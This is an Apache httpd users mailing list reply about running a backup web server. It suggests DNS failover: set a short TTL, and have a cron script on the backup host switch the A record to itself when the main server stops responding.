See http://httpd.apache.org/userslist.html> for more info.
To unsubscribe, e-mail: users-unsubscr...@httpd.apache.org
  "   from the digest: users-digest-unsubscr...@httpd.apache.org
For additional commands, e-mail: users-h...@httpd.apache.org

Re: [users@httpd] How to run a backup server?

[Jeroen Geilman]

On 06/10/2011 09:05 PM, Wilson Hernandez wrote:

Thanks for replying.

I actually would like to have the main server locally and the backup 
server hosted somewhere else with: Amazon, Godaddy, etc...



The cheapest way is to point the hostname to your home IP, and set a 
very short TTL, say 5 minutes.

Use the minimum your DNS hoster will accept.

Then you can switch to your backup in that time frame by altering the A 
record.


This is trivially automated by running a cron script on the backup 
server that checks if your home IP is responding, and if not, switches 
the DNS record to itself.



--
J.


-
The official User-To-User support forum of the Apache HTTP Server Project.
See http://httpd.apache.org/userslist.html> for more info.
To unsubscribe, e-mail: users-unsubscr...@httpd.apache.org
  "   from the digest: users-digest-unsubscr...@httpd.apache.org
For additional commands, e-mail: users-h...@httpd.apache.org